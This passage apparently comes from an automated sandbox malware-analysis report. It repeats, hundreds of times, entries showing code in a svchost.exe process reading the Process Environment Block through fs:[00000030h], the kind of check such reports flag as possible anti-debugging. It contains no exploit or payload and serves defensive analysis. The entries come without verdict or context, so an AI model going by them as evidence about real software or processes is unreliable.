          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D062D6 mov eax, dword ptr fs:[00000030h]17_2_03D062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402E1 mov eax, dword ptr fs:[00000030h]17_2_03C402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E284 mov eax, dword ptr fs:[00000030h]17_2_03C6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E284 mov eax, dword ptr fs:[00000030h]17_2_03C6E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0283 mov eax, dword ptr fs:[00000030h]17_2_03CB0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402A0 mov eax, dword ptr fs:[00000030h]17_2_03C402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C402A0 mov eax, dword ptr fs:[00000030h]17_2_03C402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC62A0 mov eax, dword ptr fs:[00000030h]17_2_03CC62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB8243 mov eax, dword ptr fs:[00000030h]17_2_03CB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB8243 mov ecx, dword ptr fs:[00000030h]17_2_03CB8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0625D mov eax, dword ptr fs:[00000030h]17_2_03D0625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A250 mov eax, dword ptr fs:[00000030h]17_2_03C2A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36259 mov eax, dword ptr fs:[00000030h]17_2_03C36259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA250 mov eax, dword ptr fs:[00000030h]17_2_03CEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEA250 mov eax, dword ptr fs:[00000030h]17_2_03CEA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34260 mov eax, dword ptr fs:[00000030h]17_2_03C34260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2826B mov eax, dword ptr fs:[00000030h]17_2_03C2826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE0274 mov eax, dword ptr fs:[00000030h]17_2_03CE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2823B mov eax, dword ptr fs:[00000030h]17_2_03C2823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF61C3 mov eax, dword ptr fs:[00000030h]17_2_03CF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF61C3 mov eax, dword ptr fs:[00000030h]17_2_03CF61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]17_2_03CAE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D061E5 mov eax, dword ptr fs:[00000030h]17_2_03D061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C601F8 mov eax, dword ptr fs:[00000030h]17_2_03C601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C70185 mov eax, dword ptr fs:[00000030h]17_2_03C70185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC188 mov eax, dword ptr fs:[00000030h]17_2_03CEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC188 mov eax, dword ptr fs:[00000030h]17_2_03CEC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4180 mov eax, dword ptr fs:[00000030h]17_2_03CD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4180 mov eax, dword ptr fs:[00000030h]17_2_03CD4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB019F mov eax, dword ptr fs:[00000030h]17_2_03CB019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A197 mov eax, dword ptr fs:[00000030h]17_2_03C2A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov ecx, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC4144 mov eax, dword ptr fs:[00000030h]17_2_03CC4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C156 mov eax, dword ptr fs:[00000030h]17_2_03C2C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC8158 mov eax, dword ptr fs:[00000030h]17_2_03CC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36154 mov eax, dword ptr fs:[00000030h]17_2_03C36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C36154 mov eax, dword ptr fs:[00000030h]17_2_03C36154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04164 mov eax, dword ptr fs:[00000030h]17_2_03D04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04164 mov eax, dword ptr fs:[00000030h]17_2_03D04164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov eax, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE10E mov ecx, dword ptr fs:[00000030h]17_2_03CDE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov ecx, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDA118 mov eax, dword ptr fs:[00000030h]17_2_03CDA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF0115 mov eax, dword ptr fs:[00000030h]17_2_03CF0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C60124 mov eax, dword ptr fs:[00000030h]17_2_03C60124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB20DE mov eax, dword ptr fs:[00000030h]17_2_03CB20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]17_2_03C2A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C380E9 mov eax, dword ptr fs:[00000030h]17_2_03C380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB60E0 mov eax, dword ptr fs:[00000030h]17_2_03CB60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]17_2_03C2C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C720F0 mov ecx, dword ptr fs:[00000030h]17_2_03C720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3208A mov eax, dword ptr fs:[00000030h]17_2_03C3208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C280A0 mov eax, dword ptr fs:[00000030h]17_2_03C280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC80A8 mov eax, dword ptr fs:[00000030h]17_2_03CC80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF60B8 mov eax, dword ptr fs:[00000030h]17_2_03CF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]17_2_03CF60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C32050 mov eax, dword ptr fs:[00000030h]17_2_03C32050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB6050 mov eax, dword ptr fs:[00000030h]17_2_03CB6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5C073 mov eax, dword ptr fs:[00000030h]17_2_03C5C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB4000 mov ecx, dword ptr fs:[00000030h]17_2_03CB4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD2000 mov eax, dword ptr fs:[00000030h]17_2_03CD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E016 mov eax, dword ptr fs:[00000030h]17_2_03C4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E016 mov eax, dword ptr fs:[00000030h]17_2_03C4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E016 mov eax, dword ptr fs:[00000030h]17_2_03C4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E016 mov eax, dword ptr fs:[00000030h]17_2_03C4E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2A020 mov eax, dword ptr fs:[00000030h]17_2_03C2A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C020 mov eax, dword ptr fs:[00000030h]17_2_03C2C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC6030 mov eax, dword ptr fs:[00000030h]17_2_03CC6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]17_2_03C3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB07C3 mov eax, dword ptr fs:[00000030h]17_2_03CB07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C527ED mov eax, dword ptr fs:[00000030h]17_2_03C527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C527ED mov eax, dword ptr fs:[00000030h]17_2_03C527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C527ED mov eax, dword ptr fs:[00000030h]17_2_03C527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]17_2_03CBE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C347FB mov eax, dword ptr fs:[00000030h]17_2_03C347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C347FB mov eax, dword ptr fs:[00000030h]17_2_03C347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD678E mov eax, dword ptr fs:[00000030h]17_2_03CD678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C307AF mov eax, dword ptr fs:[00000030h]17_2_03C307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CE47A0 mov eax, dword ptr fs:[00000030h]17_2_03CE47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6674D mov esi, dword ptr fs:[00000030h]17_2_03C6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6674D mov eax, dword ptr fs:[00000030h]17_2_03C6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6674D mov eax, dword ptr fs:[00000030h]17_2_03C6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30750 mov eax, dword ptr fs:[00000030h]17_2_03C30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBE75D mov eax, dword ptr fs:[00000030h]17_2_03CBE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72750 mov eax, dword ptr fs:[00000030h]17_2_03C72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72750 mov eax, dword ptr fs:[00000030h]17_2_03C72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB4755 mov eax, dword ptr fs:[00000030h]17_2_03CB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38770 mov eax, dword ptr fs:[00000030h]17_2_03C38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C40770 mov eax, dword ptr fs:[00000030h]17_2_03C40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C700 mov eax, dword ptr fs:[00000030h]17_2_03C6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30710 mov eax, dword ptr fs:[00000030h]17_2_03C30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C60710 mov eax, dword ptr fs:[00000030h]17_2_03C60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C720 mov eax, dword ptr fs:[00000030h]17_2_03C6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C720 mov eax, dword ptr fs:[00000030h]17_2_03C6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6273C mov eax, dword ptr fs:[00000030h]17_2_03C6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6273C mov ecx, dword ptr fs:[00000030h]17_2_03C6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6273C mov eax, dword ptr fs:[00000030h]17_2_03C6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAC730 mov eax, dword ptr fs:[00000030h]17_2_03CAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]17_2_03C6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]17_2_03C6A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]17_2_03CAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]17_2_03CAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]17_2_03CAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]17_2_03CAE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB06F1 mov eax, dword ptr fs:[00000030h]17_2_03CB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB06F1 mov eax, dword ptr fs:[00000030h]17_2_03CB06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34690 mov eax, dword ptr fs:[00000030h]17_2_03C34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C34690 mov eax, dword ptr fs:[00000030h]17_2_03C34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]17_2_03C6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C666B0 mov eax, dword ptr fs:[00000030h]17_2_03C666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4C640 mov eax, dword ptr fs:[00000030h]17_2_03C4C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF866E mov eax, dword ptr fs:[00000030h]17_2_03CF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CF866E mov eax, dword ptr fs:[00000030h]17_2_03CF866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A660 mov eax, dword ptr fs:[00000030h]17_2_03C6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A660 mov eax, dword ptr fs:[00000030h]17_2_03C6A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C62674 mov eax, dword ptr fs:[00000030h]17_2_03C62674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE609 mov eax, dword ptr fs:[00000030h]17_2_03CAE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4260B mov eax, dword ptr fs:[00000030h]17_2_03C4260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C72619 mov eax, dword ptr fs:[00000030h]17_2_03C72619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E627 mov eax, dword ptr fs:[00000030h]17_2_03C4E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C66620 mov eax, dword ptr fs:[00000030h]17_2_03C66620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C68620 mov eax, dword ptr fs:[00000030h]17_2_03C68620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3262C mov eax, dword ptr fs:[00000030h]17_2_03C3262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E5CF mov eax, dword ptr fs:[00000030h]17_2_03C6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E5CF mov eax, dword ptr fs:[00000030h]17_2_03C6E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C365D0 mov eax, dword ptr fs:[00000030h]17_2_03C365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]17_2_03C6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]17_2_03C6A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]17_2_03C5E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C325E0 mov eax, dword ptr fs:[00000030h]17_2_03C325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C5ED mov eax, dword ptr fs:[00000030h]17_2_03C6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C5ED mov eax, dword ptr fs:[00000030h]17_2_03C6C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C32582 mov eax, dword ptr fs:[00000030h]17_2_03C32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C32582 mov ecx, dword ptr fs:[00000030h]17_2_03C32582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C64588 mov eax, dword ptr fs:[00000030h]17_2_03C64588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6E59C mov eax, dword ptr fs:[00000030h]17_2_03C6E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB05A7 mov eax, dword ptr fs:[00000030h]17_2_03CB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB05A7 mov eax, dword ptr fs:[00000030h]17_2_03CB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB05A7 mov eax, dword ptr fs:[00000030h]17_2_03CB05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C545B1 mov eax, dword ptr fs:[00000030h]17_2_03C545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C545B1 mov eax, dword ptr fs:[00000030h]17_2_03C545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38550 mov eax, dword ptr fs:[00000030h]17_2_03C38550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C38550 mov eax, dword ptr fs:[00000030h]17_2_03C38550
